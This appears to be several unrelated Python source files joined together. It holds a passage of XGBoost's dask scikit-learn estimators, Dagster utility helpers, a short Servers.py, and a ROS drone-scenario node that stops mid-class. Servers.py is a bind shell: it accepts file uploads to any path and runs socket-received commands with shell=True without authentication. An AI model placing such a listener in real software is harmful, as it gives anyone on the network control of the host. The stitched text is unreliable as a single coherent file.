See :py:meth:`xgboost.Booster.inplace_predict` for details.
missing:
Value in the input data which needs to be present as a missing
value. If None, defaults to np.nan.
base_margin:
See :py:obj:`xgboost.DMatrix` for details. Right now classifier is not well
supported with base_margin as it requires the size of base margin to be `n_classes
* n_samples`.
.. versionadded:: 1.4.0
strict_shape:
See :py:meth:`xgboost.Booster.predict` for details.
.. versionadded:: 1.4.0
Returns
-------
prediction :
When input data is ``dask.array.Array``, the return value is an array, when input
data is ``dask.dataframe.DataFrame``, return value can be
``dask.dataframe.Series``, ``dask.dataframe.DataFrame``, depending on the output
shape.
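    A minimal usage sketch (illustrative; assumes a trained ``booster`` and a dask
    array ``X`` on an active ``client``):
    .. code-block:: python
        from xgboost import dask as dxgb
        predt = dxgb.inplace_predict(client, booster, X)
        result = predt.compute()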
"""
_assert_dask_support()
client = _xgb_get_client(client)
return client.sync(
_inplace_predict_async, global_config=config.get_config(), **locals()
)
async def _async_wrap_evaluation_matrices(
client: "distributed.Client", **kwargs: Any
) -> Tuple[DaskDMatrix, Optional[List[Tuple[DaskDMatrix, str]]]]:
"""A switch function for async environment."""
def _inner(**kwargs: Any) -> DaskDMatrix:
m = DaskDMatrix(client=client, **kwargs)
return m
train_dmatrix, evals = _wrap_evaluation_matrices(create_dmatrix=_inner, **kwargs)
train_dmatrix = await train_dmatrix
if evals is None:
return train_dmatrix, evals
awaited = []
for e in evals:
if e[0] is train_dmatrix: # already awaited
awaited.append(e)
continue
awaited.append((await e[0], e[1]))
return train_dmatrix, awaited
class DaskScikitLearnBase(XGBModel):
"""Base class for implementing scikit-learn interface with Dask"""
_client = None
async def _predict_async(
self,
data: _DaskCollection,
output_margin: bool,
validate_features: bool,
base_margin: Optional[_DaskCollection],
iteration_range: Optional[Tuple[int, int]],
) -> Any:
iteration_range = self._get_iteration_range(iteration_range)
if self._can_use_inplace_predict():
predts = await inplace_predict(
client=self.client,
model=self.get_booster(),
data=data,
iteration_range=iteration_range,
predict_type="margin" if output_margin else "value",
missing=self.missing,
base_margin=base_margin,
validate_features=validate_features,
)
if isinstance(predts, dd.DataFrame):
predts = predts.to_dask_array()
else:
test_dmatrix = await DaskDMatrix(
self.client, data=data, base_margin=base_margin, missing=self.missing
)
predts = await predict(
self.client,
model=self.get_booster(),
data=test_dmatrix,
output_margin=output_margin,
validate_features=validate_features,
iteration_range=iteration_range,
)
return predts
def predict(
self,
X: _DaskCollection,
output_margin: bool = False,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
base_margin: Optional[_DaskCollection] = None,
iteration_range: Optional[Tuple[int, int]] = None,
) -> Any:
_assert_dask_support()
msg = "`ntree_limit` is not supported on dask, use `iteration_range` instead."
assert ntree_limit is None, msg
return self.client.sync(
self._predict_async,
X,
output_margin=output_margin,
validate_features=validate_features,
base_margin=base_margin,
iteration_range=iteration_range,
)
async def _apply_async(
self,
X: _DaskCollection,
iteration_range: Optional[Tuple[int, int]] = None,
) -> Any:
iteration_range = self._get_iteration_range(iteration_range)
test_dmatrix = await DaskDMatrix(self.client, data=X, missing=self.missing)
predts = await predict(
self.client,
model=self.get_booster(),
data=test_dmatrix,
pred_leaf=True,
iteration_range=iteration_range,
)
return predts
def apply(
self,
X: _DaskCollection,
ntree_limit: Optional[int] = None,
iteration_range: Optional[Tuple[int, int]] = None,
) -> Any:
_assert_dask_support()
msg = "`ntree_limit` is not supported on dask, use `iteration_range` instead."
assert ntree_limit is None, msg
return self.client.sync(self._apply_async, X, iteration_range=iteration_range)
def __await__(self) -> Awaitable[Any]:
# Generate a coroutine wrapper to make this class awaitable.
async def _() -> Awaitable[Any]:
return self
return self.client.sync(_).__await__()
def __getstate__(self) -> Dict:
this = self.__dict__.copy()
if "_client" in this.keys():
del this["_client"]
return this
@property
def client(self) -> "distributed.Client":
"""The dask client used in this model."""
client = _xgb_get_client(self._client)
return client
@client.setter
def client(self, clt: "distributed.Client") -> None:
self._client = clt
@xgboost_model_doc(
"""Implementation of the Scikit-Learn API for XGBoost.""", ["estimators", "model"]
)
class DaskXGBRegressor(DaskScikitLearnBase, XGBRegressorBase):
# pylint: disable=missing-class-docstring
async def _fit_async(
self,
X: _DaskCollection,
y: _DaskCollection,
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
eval_metric: Optional[Union[str, List[str], Metric]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
base_margin_eval_set: Optional[List[_DaskCollection]],
early_stopping_rounds: int,
verbose: bool,
xgb_model: Optional[Union[Booster, XGBModel]],
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]],
) -> _DaskCollection:
params = self.get_xgb_params()
dtrain, evals = await _async_wrap_evaluation_matrices(
client=self.client,
X=X,
y=y,
group=None,
qid=None,
sample_weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
eval_set=eval_set,
sample_weight_eval_set=sample_weight_eval_set,
base_margin_eval_set=base_margin_eval_set,
eval_group=None,
eval_qid=None,
missing=self.missing,
)
if callable(self.objective):
obj = _objective_decorator(self.objective)
else:
obj = None
model, metric, params = self._configure_fit(
booster=xgb_model, eval_metric=eval_metric, params=params
)
results = await train(
client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
feval=metric,
obj=obj,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks,
xgb_model=model,
)
self._Booster = results["booster"]
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results["history"]
return self
# pylint: disable=missing-docstring, disable=unused-argument
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]] = None,
eval_metric: Optional[Union[str, List[str], Metric]] = None,
early_stopping_rounds: Optional[int] = None,
verbose: bool = True,
xgb_model: Optional[Union[Booster, XGBModel]] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
base_margin_eval_set: Optional[List[_DaskCollection]] = None,
feature_weights: Optional[_DaskCollection] = None,
callbacks: Optional[List[TrainingCallback]] = None,
) -> "DaskXGBRegressor":
_assert_dask_support()
args = {k: v for k, v in locals().items() if k != "self"}
return self.client.sync(self._fit_async, **args)
@xgboost_model_doc(
'Implementation of the scikit-learn API for XGBoost classification.',
['estimators', 'model'])
class DaskXGBClassifier(DaskScikitLearnBase, XGBClassifierBase):
# pylint: disable=missing-class-docstring
async def _fit_async(
self, X: _DaskCollection, y: _DaskCollection,
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
eval_metric: Optional[Union[str, List[str], Metric]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
base_margin_eval_set: Optional[List[_DaskCollection]],
early_stopping_rounds: int,
verbose: bool,
xgb_model: Optional[Union[Booster, XGBModel]],
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]]
) -> "DaskXGBClassifier":
params = self.get_xgb_params()
dtrain, evals = await _async_wrap_evaluation_matrices(
self.client,
X=X,
y=y,
group=None,
qid=None,
sample_weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
eval_set=eval_set,
sample_weight_eval_set=sample_weight_eval_set,
base_margin_eval_set=base_margin_eval_set,
eval_group=None,
eval_qid=None,
missing=self.missing,
)
# pylint: disable=attribute-defined-outside-init
        if isinstance(y, da.Array):
self.classes_ = await self.client.compute(da.unique(y))
else:
self.classes_ = await self.client.compute(y.drop_duplicates())
self.n_classes_ = len(self.classes_)
if self.n_classes_ > 2:
params["objective"] = "multi:softprob"
params['num_class'] = self.n_classes_
else:
params["objective"] = "binary:logistic"
if callable(self.objective):
obj = _objective_decorator(self.objective)
else:
obj = None
model, metric, params = self._configure_fit(
booster=xgb_model, eval_metric=eval_metric, params=params
)
results = await train(
client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
obj=obj,
feval=metric,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks,
xgb_model=model,
)
self._Booster = results['booster']
if not callable(self.objective):
self.objective = params["objective"]
# pylint: disable=attribute-defined-outside-init
self.evals_result_ = results['history']
return self
# pylint: disable=unused-argument
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]] = None,
eval_metric: Optional[Union[str, List[str], Metric]] = None,
early_stopping_rounds: Optional[int] = None,
verbose: bool = True,
xgb_model: Optional[Union[Booster, XGBModel]] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
base_margin_eval_set: Optional[List[_DaskCollection]] = None,
feature_weights: Optional[_DaskCollection] = None,
callbacks: Optional[List[TrainingCallback]] = None
) -> "DaskXGBClassifier":
_assert_dask_support()
args = {k: v for k, v in locals().items() if k != 'self'}
return self.client.sync(self._fit_async, **args)
async def _predict_proba_async(
self,
X: _DaskCollection,
validate_features: bool,
output_margin: bool,
base_margin: Optional[_DaskCollection],
iteration_range: Optional[Tuple[int, int]],
) -> _DaskCollection:
if iteration_range is None:
iteration_range = (0, 0)
predts = await super()._predict_async(
data=X,
output_margin=output_margin,
validate_features=validate_features,
base_margin=base_margin,
iteration_range=iteration_range,
)
return _cls_predict_proba(self.objective, predts, da.vstack)
# pylint: disable=missing-function-docstring
def predict_proba(
self,
X: _DaskCollection,
ntree_limit: Optional[int] = None,
validate_features: bool = True,
output_margin: bool = False,
base_margin: Optional[_DaskCollection] = None,
iteration_range: Optional[Tuple[int, int]] = None,
) -> Any:
_assert_dask_support()
msg = "`ntree_limit` is not supported on dask, use `iteration_range` instead."
assert ntree_limit is None, msg
return self.client.sync(
self._predict_proba_async,
X=X,
validate_features=validate_features,
output_margin=output_margin,
base_margin=base_margin,
iteration_range=iteration_range,
)
predict_proba.__doc__ = XGBClassifier.predict_proba.__doc__
async def _predict_async(
self,
data: _DaskCollection,
output_margin: bool,
validate_features: bool,
base_margin: Optional[_DaskCollection],
iteration_range: Optional[Tuple[int, int]],
) -> _DaskCollection:
pred_probs = await super()._predict_async(
data, output_margin, validate_features, base_margin, iteration_range
)
if output_margin:
return pred_probs
if len(pred_probs.shape) == 1:
preds = (pred_probs > 0.5).astype(int)
else:
assert len(pred_probs.shape) == 2
assert isinstance(pred_probs, da.Array)
# when using da.argmax directly, dask will construct a numpy based return
# array, which runs into error when computing GPU based prediction.
def _argmax(x: Any) -> Any:
return x.argmax(axis=1)
preds = da.map_blocks(_argmax, pred_probs, drop_axis=1)
return preds
@xgboost_model_doc(
"""Implementation of the Scikit-Learn API for XGBoost Ranking.
.. versionadded:: 1.4.0
""",
["estimators", "model"],
end_note="""
Note
----
For dask implementation, group is not supported, use qid instead.
""",
)
class DaskXGBRanker(DaskScikitLearnBase, XGBRankerMixIn):
@_deprecate_positional_args
def __init__(self, *, objective: str = "rank:pairwise", **kwargs: Any):
if callable(objective):
raise ValueError("Custom objective function not supported by XGBRanker.")
        super().__init__(objective=objective, **kwargs)
async def _fit_async(
self,
X: _DaskCollection,
y: _DaskCollection,
group: Optional[_DaskCollection],
qid: Optional[_DaskCollection],
sample_weight: Optional[_DaskCollection],
base_margin: Optional[_DaskCollection],
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]],
sample_weight_eval_set: Optional[List[_DaskCollection]],
base_margin_eval_set: Optional[List[_DaskCollection]],
eval_group: Optional[List[_DaskCollection]],
eval_qid: Optional[List[_DaskCollection]],
eval_metric: Optional[Union[str, List[str], Metric]],
early_stopping_rounds: int,
verbose: bool,
xgb_model: Optional[Union[XGBModel, Booster]],
feature_weights: Optional[_DaskCollection],
callbacks: Optional[List[TrainingCallback]],
) -> "DaskXGBRanker":
msg = "Use `qid` instead of `group` on dask interface."
if not (group is None and eval_group is None):
raise ValueError(msg)
if qid is None:
raise ValueError("`qid` is required for ranking.")
params = self.get_xgb_params()
dtrain, evals = await _async_wrap_evaluation_matrices(
self.client,
X=X,
y=y,
group=None,
qid=qid,
sample_weight=sample_weight,
base_margin=base_margin,
feature_weights=feature_weights,
eval_set=eval_set,
sample_weight_eval_set=sample_weight_eval_set,
base_margin_eval_set=base_margin_eval_set,
eval_group=None,
eval_qid=eval_qid,
missing=self.missing,
)
if eval_metric is not None:
if callable(eval_metric):
raise ValueError(
"Custom evaluation metric is not yet supported for XGBRanker."
)
model, metric, params = self._configure_fit(
booster=xgb_model, eval_metric=eval_metric, params=params
)
results = await train(
client=self.client,
params=params,
dtrain=dtrain,
num_boost_round=self.get_num_boosting_rounds(),
evals=evals,
feval=metric,
verbose_eval=verbose,
early_stopping_rounds=early_stopping_rounds,
callbacks=callbacks,
xgb_model=model,
)
self._Booster = results["booster"]
self.evals_result_ = results["history"]
return self
# pylint: disable=unused-argument, arguments-differ
@_deprecate_positional_args
def fit(
self,
X: _DaskCollection,
y: _DaskCollection,
*,
group: Optional[_DaskCollection] = None,
qid: Optional[_DaskCollection] = None,
sample_weight: Optional[_DaskCollection] = None,
base_margin: Optional[_DaskCollection] = None,
eval_set: Optional[List[Tuple[_DaskCollection, _DaskCollection]]] = None,
eval_group: Optional[List[_DaskCollection]] = None,
eval_qid: Optional[List[_DaskCollection]] = None,
eval_metric: Optional[Union[str, List[str], Metric]] = None,
        early_stopping_rounds: Optional[int] = None,
verbose: bool = False,
xgb_model: Optional[Union[XGBModel, Booster]] = None,
sample_weight_eval_set: Optional[List[_DaskCollection]] = None,
base_margin_eval_set: Optional[List[_DaskCollection]] = None,
feature_weights: Optional[_DaskCollection] = None,
callbacks: Optional[List[TrainingCallback]] = None
) -> "DaskXGBRanker":
_assert_dask_support()
args = {k: v for k, v in locals().items() if k != "self"}
return self.client.sync(self._fit_async, **args)
# FIXME(trivialfis): arguments differ due to additional parameters like group and qid.
fit.__doc__ = XGBRanker.fit.__doc__
@xgboost_model_doc(
"""Implementation of the Scikit-Learn API for XGBoost Random Forest Regressor.
.. versionadded:: 1.4.0
""",
["model", "objective"],
extra_parameters="""
n_estimators : int
Number of trees in random forest to fit.
""",
)
class DaskXGBRFRegressor(DaskXGBRegressor):
@_deprecate_positional_args
def __init__(
self,
*,
learning_rate: Optional[float] = 1,
subsample: Optional[float] = 0.8,
colsample_bynode: Optional[float] = 0.8,
reg_lambda: Optional[float] = 1e-5,
**kwargs: Any
) -> None:
super().__init__(
learning_rate=learning_rate,
subsample=subsample,
colsample_bynode=colsample_bynode,
reg_lambda=reg_lambda,
**kwargs
)
def get_xgb_params(self) -> Dict[str, Any]:
params = super().get_xgb_params()
params["num_parallel_tree"] = self.n_estimators
return params
def get_num_boosting_rounds(self) -> int:
return 1
@xgboost_model_doc(
"""Implementation of the Scikit-Learn API for XGBoost Random Forest Classifier.
.. versionadded:: 1.4.0
""",
["model", "objective"],
extra_parameters="""
n_estimators : int
Number of trees in random forest to fit.
""",
)
class DaskXGBRFClassifier(DaskXGBClassifier):
@_deprecate_positional_args
def __init__(
self,
*,
learning_rate: Optional[float] = 1,
subsample: Optional[float] = 0.8,
colsample_bynode: Optional[float] = 0.8,
reg_lambda: Optional[float] = 1e-5,
**kwargs: Any
) -> None:
super().__init__(
learning_rate=learning_rate,
subsample=subsample,
colsample_bynode=colsample_bynode,
reg_lambda=reg_lambda,
**kwargs
)
def get_xgb_params(self) -> Dict[str, Any]:
params = super().get_xgb_params()
params["num_parallel_tree"] = self.n_estimators
return params
def get_num_boosting_rounds(self) -> int:
return 1
|
__init__.py | import contextlib
import datetime
import errno
import inspect
import multiprocessing
import os
import re
import signal
import subprocess
import sys
import tempfile
import threading
from collections import namedtuple
from enum import Enum
from warnings import warn
import yaml
from six.moves import configparser
from dagster import check
from dagster.core.errors import DagsterInvariantViolationError
from dagster.seven import IS_WINDOWS, thread
from dagster.seven.abc import Mapping
from .yaml_utils import load_yaml_from_glob_list, load_yaml_from_globs, load_yaml_from_path
if sys.version_info > (3,):
from pathlib import Path # pylint: disable=import-error
else:
from pathlib2 import Path # pylint: disable=import-error
EPOCH = datetime.datetime.utcfromtimestamp(0)
PICKLE_PROTOCOL = 2
DEFAULT_REPOSITORY_YAML_FILENAME = 'repository.yaml'
def file_relative_path(dunderfile, relative_path):
'''
This function is useful when one needs to load a file that is
relative to the position of the current file. (Such as when
    you encode a configuration file path in a source file and want
    it to be runnable from any current working directory)
It is meant to be used like the following:
file_relative_path(__file__, 'path/relative/to/file')
'''
check.str_param(dunderfile, 'dunderfile')
check.str_param(relative_path, 'relative_path')
return os.path.join(os.path.dirname(dunderfile), relative_path)
def script_relative_path(file_path):
'''
Useful for testing with local files. Use a path relative to where the
test resides and this function will return the absolute path
    of that file. Otherwise it will be relative to the script that
    ran the test.
    Note: this function is very, very expensive (on the order of 1
millisecond per invocation) so this should only be used in performance
insensitive contexts. Prefer file_relative_path for anything with
performance constraints.
'''
# from http://bit.ly/2snyC6s
check.str_param(file_path, 'file_path')
scriptdir = inspect.stack()[1][1]
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(scriptdir)), file_path))
# Adapted from https://github.com/okunishinishi/python-stringcase/blob/master/stringcase.py
def camelcase(string):
check.str_param(string, 'string')
string = re.sub(r'^[\-_\.]', '', str(string))
if not string:
return string
return str(string[0]).upper() + re.sub(
r'[\-_\.\s]([a-z])', lambda matched: str(matched.group(1)).upper(), string[1:]
)
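# Illustrative behavior sketch: camelcase('hello_world') == 'HelloWorld' and
# camelcase('-some.value') == 'SomeValue'.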
def ensure_single_item(ddict):
check.dict_param(ddict, 'ddict')
check.param_invariant(len(ddict) == 1, 'ddict', 'Expected dict with single item')
return list(ddict.items())[0]
@contextlib.contextmanager
def pushd(path):
old_cwd = os.getcwd()
os.chdir(path)
try:
yield path
finally:
os.chdir(old_cwd)
def safe_isfile(path):
'''"Backport of Python 3.8 os.path.isfile behavior.
This is intended to backport https://docs.python.org/dev/whatsnew/3.8.html#os-path. I'm not
sure that there are other ways to provoke this behavior on Unix other than the null byte,
but there are certainly other ways to do it on Windows. Afaict, we won't mask other
ValueErrors, and the behavior in the status quo ante is rough because we risk throwing an
unexpected, uncaught ValueError from very deep in our logic.
'''
try:
return os.path.isfile(path)
except ValueError:
return False
def mkdir_p(path):
try:
os.makedirs(path)
return path
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def merge_dicts(left, right):
check.dict_param(left, 'left')
check.dict_param(right, 'right')
result = left.copy()
result.update(right)
return result
class frozendict(dict):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyDict")
# https://docs.python.org/3/library/pickle.html#object.__reduce__
#
# For a dict, the default behavior for pickle is to iteratively call __setitem__ (see 5th item
# in __reduce__ tuple). Since we want to disable __setitem__ and still inherit dict, we
# override this behavior by defining __reduce__. We return the 3rd item in the tuple, which is
# passed to __setstate__, allowing us to restore the frozendict.
def __reduce__(self):
return (frozendict, (), dict(self))
def __setstate__(self, state):
self.__init__(state)
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
popitem = __readonly__
clear = __readonly__
update = __readonly__
setdefault = __readonly__
del __readonly__
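# Illustrative round-trip sketch for the __reduce__/__setstate__ machinery above
# (standard-library pickle only):
#     import pickle
#     fd = frozendict({'a': 1})
#     restored = pickle.loads(pickle.dumps(fd))
#     assert restored == {'a': 1}
#     fd['b'] = 2  # raises RuntimeError("Cannot modify ReadOnlyDict")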
class frozenlist(list):
def __readonly__(self, *args, **kwargs):
raise RuntimeError("Cannot modify ReadOnlyList")
__setitem__ = __readonly__
__delitem__ = __readonly__
append = __readonly__
clear = __readonly__
extend = __readonly__
insert = __readonly__
pop = __readonly__
remove = __readonly__
reverse = __readonly__
sort = __readonly__
def make_readonly_value(value):
if isinstance(value, list):
return frozenlist(list(map(make_readonly_value, value)))
elif isinstance(value, dict):
return frozendict({key: make_readonly_value(value) for key, value in value.items()})
else:
return value
def get_prop_or_key(elem, key):
if isinstance(elem, Mapping):
return elem.get(key)
else:
return getattr(elem, key)
def list_pull(alist, key):
return list(map(lambda elem: get_prop_or_key(elem, key), alist))
def get_multiprocessing_context():
# Set execution method to spawn, to avoid fork and to have same behavior between platforms.
# Older versions are stuck with whatever is the default on their platform (fork on
# Unix-like and spawn on windows)
#
# https://docs.python.org/3/library/multiprocessing.html#multiprocessing.get_context
if hasattr(multiprocessing, 'get_context'):
return multiprocessing.get_context('spawn')
else:
return multiprocessing
def all_none(kwargs):
for value in kwargs.values():
if value is not None:
return False
return True
def check_script(path, return_code=0):
try:
subprocess.check_output(['python', path])
except subprocess.CalledProcessError as exc:
if return_code != 0:
if exc.returncode == return_code:
return
raise
def check_cli_execute_file_pipeline(path, pipeline_fn_name, env_file=None):
cli_cmd = ['python', '-m', 'dagster', 'pipeline', 'execute', '-f', path, '-n', pipeline_fn_name]
if env_file:
cli_cmd.append('-e')
cli_cmd.append(env_file)
try:
subprocess.check_output(cli_cmd)
except subprocess.CalledProcessError as cpe:
print(cpe)
raise cpe
@contextlib.contextmanager
def safe_tempfile_path():
# This gets a valid temporary file path in the safest possible way, although there is still no
# guarantee that another process will not create a file at this path. The NamedTemporaryFile is
# deleted when the context manager exits and the file object is closed.
#
# This is preferable to using NamedTemporaryFile as a context manager and passing the name
# attribute of the file object around because NamedTemporaryFiles cannot be opened a second time
# if already open on Windows NT or later:
# https://docs.python.org/3.8/library/tempfile.html#tempfile.NamedTemporaryFile
# https://github.com/dagster-io/dagster/issues/1582
with tempfile.NamedTemporaryFile() as fd:
path = fd.name
try:
yield Path(path).as_posix()
finally:
if os.path.exists(path):
os.unlink(path)
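# Illustrative usage sketch for safe_tempfile_path (the yielded path is removed
# when the with-block exits):
#     with safe_tempfile_path() as path:
#         with open(path, 'w') as f:
#             f.write('scratch data')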
def ensure_gen(thing_or_gen):
if not inspect.isgenerator(thing_or_gen):
def _gen_thing():
yield thing_or_gen
return _gen_thing()
return thing_or_gen
def ensure_dir(file_path):
try:
os.makedirs(file_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def ensure_file(path):
ensure_dir(os.path.dirname(path))
if not os.path.exists(path):
touch_file(path)
def touch_file(path):
ensure_dir(os.path.dirname(path))
with open(path, 'a'):
os.utime(path, None)
def _kill_on_event(termination_event):
termination_event.wait()
if IS_WINDOWS:
        # This will raise a KeyboardInterrupt in python land - meaning this won't be able to
        # interrupt things like sleep()
thread.interrupt_main()
else:
# If on unix send an os level signal to interrupt any situation we may be stuck in
os.kill(os.getpid(), signal.SIGINT)
# Function to be invoked by daemon thread in processes which seek to be cancellable.
# The motivation for this approach is to be able to exit cleanly on Windows. An alternative
# path is to change how the processes are opened and send CTRL_BREAK signals, which at
# the time of authoring seemed a more costly approach.
#
# Reading for the curious:
# * https://stackoverflow.com/questions/35772001/how-to-handle-the-signal-in-python-on-windows-machine
# * https://stefan.sofa-rockers.org/2013/08/15/handling-sub-process-hierarchies-python-linux-os-x/
def start_termination_thread(termination_event):
check.inst_param(
termination_event, 'termination_event', ttype=type(get_multiprocessing_context().Event())
)
int_thread = threading.Thread(target=_kill_on_event, args=(termination_event,))
int_thread.daemon = True
int_thread.start()
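# Illustrative wiring sketch (assumes the spawn context returned by
# get_multiprocessing_context above; the event may be set from another process):
#     ctx = get_multiprocessing_context()
#     termination_event = ctx.Event()
#     start_termination_thread(termination_event)
#     termination_event.set()  # interrupts this process via SIGINT / interrupt_main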
def datetime_as_float(dt):
check.inst_param(dt, 'dt', datetime.datetime)
return float((dt - EPOCH).total_seconds())
# hashable frozen string to string dict
class frozentags(frozendict):
def __init__(self, *args, **kwargs):
super(frozentags, self).__init__(*args, **kwargs)
check.dict_param(self, 'self', key_type=str, value_type=str)
def __hash__(self):
return hash(tuple(sorted(self.items())))
def updated_with(self, new_tags):
check.dict_param(new_tags, 'new_tags', key_type=str, value_type=str)
updated = dict(self)
for key, value in new_tags.items():
updated[key] = value
return frozentags(updated)
|
Servers.py | import socket
import subprocess
from threading import Thread
class Server:
def __init__(self, ip, port):
self.ip = ip
self.port = port
class TCPServer(Server):
def __init__(self, ip, port, upload_dst=None, execute=None, command=None):
super().__init__(ip, port)
self.upload_dst = upload_dst
self.execute = execute
self.command = command
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._bind()
def _bind(self):
self.server.bind((self.ip, self.port))
@staticmethod
def run_command(command):
command = command.rstrip()
try:
output = subprocess.check_output(command,
stderr=subprocess.STDOUT,
shell=True)
        except Exception:
output = b"Failed to execute command"
return output
def client_handler(self, client_socket):
if self.upload_dst:
file_buff = b''
while True:
data = client_socket.recv(4096)
if not data:
break
else:
file_buff += data
try:
with open(self.upload_dst, 'wb') as f:
f.write(file_buff)
client_socket.send(f"Successfully saved file to {self.upload_dst}".encode('utf-8'))
            except Exception:
client_socket.send(f"Failed to save file to {self.upload_dst}".encode('utf-8'))
if self.execute:
output = self.run_command(self.execute)
client_socket.send(output)
if self.command:
client_socket.send(b"$> ")
cmd_buff = client_socket.recv(1024)
response = self.run_command(cmd_buff)
client_socket.send(response)
else:
request = client_socket.recv(4096)
try:
request = request.decode('utf-8')
except UnicodeError:
pass
print(f"[*] Received: {request}")
client_socket.send(b"ACK!")
client_socket.close()
self.server.close()
def accept(self):
while True:
client, addr = self.server.accept()
print(f"[*] Connection received from: {addr[0]}:{addr[1]}")
client_handler = Thread(target=self.client_handler, args=(client,))
client_handler.start()
@classmethod
def server_loop(cls, host, port, upload_dst=None, execute=None, command=None, n_listen=5):
tcp_server = cls(host, port, upload_dst, execute, command)
tcp_server.server.listen(n_listen)
tcp_server.accept()
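# Illustrative usage sketch: serve an interactive command prompt on all
# interfaces (blocks forever; host/port values here are arbitrary):
#     TCPServer.server_loop('0.0.0.0', 9999, command=True)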
|
polygon_node.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import rospy
from rospy import Service, Publisher, Subscriber, ServiceProxy
from std_msgs.msg import Int8, Bool
from geometry_msgs.msg import Point
from kiberdrom_interfaces.srv import VertiportSet
from kiberdrom_interfaces.srv import PoliceState, PoliceStateResponse
from kiberdrom_interfaces.srv import GoToVertiport, GoToVertiportResponse
from kiberdrom_interfaces.srv import GoToCar, GoToCarResponse
from kiberdrom_interfaces.srv import GoToLand, GoToLandResponse
from kiberdrom_interfaces.srv import Access, AccessResponse
from kiberdrom_interfaces.msg import PoliceDetect, BoolArray, PioneerStatus, PioneerStatusArray, ColorRGBAArray, StringArray, StringArray2D, VertiportsStatus
from kiberdrom_interfaces.msg import CommandAction, CommandFeedback, CommandResult
from kiberdrom_core.util import replace_number, generate_password_string, get_parameter, get_pioneers_name, get_objects_from_dict
from kiberdrom_core.status import StatusPioneer, StatusVertiport, StatusPolygon
from kiberdrom_core.controller import SimplePioneer as Pioneer, Police, Logger
from kiberdrom_core.terminal import TerminalCommand
from gs_flight import CallbackEvent
from std_srvs.srv import SetBool
from std_srvs.srv import Empty
from std_srvs.srv import Trigger, TriggerResponse
from threading import Thread
from actionlib import SimpleActionServer
# Descriptions of all variables can be found in gs_pizero_server/config/variable.yaml
# /server/check parameters
MIN_CHARGE = get_parameter("/server/check/charge")
COLISION_DISTANCE = get_parameter("/server/check/colision_distance")
PIONEER_DEGREES_OK = get_parameter("/server/check/degrees/ok")
PIONEER_DEGREES_RANGE = get_parameter("/server/check/degrees/range")
LPS_POSITION_MIN = get_parameter("/server/check/lps_position") # TODO
ZOMBIE_TIME = get_parameter("/server/check/zombie_time") # TODO
ARM_TIME = get_parameter("/server/check/arm_time")
# /server/names parameters
POLICE = get_parameter("/server/names/police")
SEARCHER = get_parameter("/server/names/searcher")
KIBERPRO_TEAM = get_parameter("/server/names/kiberpro_team")
# /server/police parameters
POLICE_DETECT_RANGE_FIRST = get_parameter("/server/police/detect_range/first")
POLICE_DETECT_RANGE_SECOND = get_parameter("/server/police/detect_range/second")
POLICE_DETECT_RANGE_HEIGHT = get_parameter("/server/police/detect_range/height")
BLOCKING_TIME = get_parameter("/server/police/blocking_time")
# /server/polygon parameters
CAR = get_parameter("/server/polygon/car")
VERTIPORT_RANGE = get_parameter("/server/polygon/vertiport/range")
# /server/scenario parameters
DEFAULT_PASSWORD = get_parameter("/server/scenario/password/default")
GENERATE_PASSWORD = get_parameter("/server/scenario/password/generate")
PASSWORD_LENGTH = get_parameter("/server/scenario/password/length")
COUNT_SEARCHER = get_parameter("/server/scenario/count_searcher")
TIME_TO_SECOND = get_parameter("/server/scenario/time_to_second")
# /objects parameters
POLYGON_OBJECTS = get_objects_from_dict(get_parameter("/objects"))
def check_zero(position):
return (position.x != 0.0) and (position.y != 0.0)
def check_range(position1, position2, radius_x, radius_y, radius_z): # check whether one object falls within another's detection range
    if check_zero(position1) and check_zero(position2):
        return (abs(position1.x - position2.x) <= radius_x) and (abs(position1.y - position2.y) <= radius_y) and (abs(position1.z - position2.z) <= radius_z)
else:
return False
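# Illustrative sketch: two points 0.5 m apart on x fall within a 1 m radius on
# every axis (assumes geometry_msgs Point; x and y must be non-zero so that
# check_zero passes):
#     a = Point(x=1.0, y=1.0, z=1.0)
#     b = Point(x=1.5, y=1.0, z=1.0)
#     check_range(a, b, 1.0, 1.0, 1.0)  # True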
class Scenario(): # scenario class
    def __init__(self, swarm, logger, vertiports, access_service):
        self.number = -1 # scenario stage counter
        self.run = True # scenario running flag
        self.init = [False, False, False] # per-stage initialization flags
        self.finish = [False, False, False] # per-stage completion flags
self.swarm = swarm
self.logger = logger
self.vertiports = vertiports
